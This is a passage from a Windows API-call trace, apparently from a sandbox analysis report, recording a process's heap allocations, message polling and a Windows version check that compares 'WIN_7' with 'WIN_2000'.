dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0261.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0261.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0261.964] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0261.964] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0261.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0261.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0261.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0261.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.964] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0261.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0261.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0261.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0261.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0261.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.965] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0261.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0261.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0261.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0261.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0261.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0261.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0261.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0261.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0261.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0261.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0261.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0261.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.966] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0261.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0261.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0261.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0261.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0261.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0261.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0261.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0261.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0261.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0261.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0261.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0261.967] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0261.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0261.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0261.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0261.967] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0261.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0261.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0261.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0261.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e10 [0261.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0261.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0261.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0261.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0261.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0261.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0261.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0261.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0261.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0261.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0261.969] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0261.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0261.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0261.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0261.969] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0261.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0261.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.969] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0261.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0261.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0261.970] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0261.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0261.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0261.970] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0261.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0261.971] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0261.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0261.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0261.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0261.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0261.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0261.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0261.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0261.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0261.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0261.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0261.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0261.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0261.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0261.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0261.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.974] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 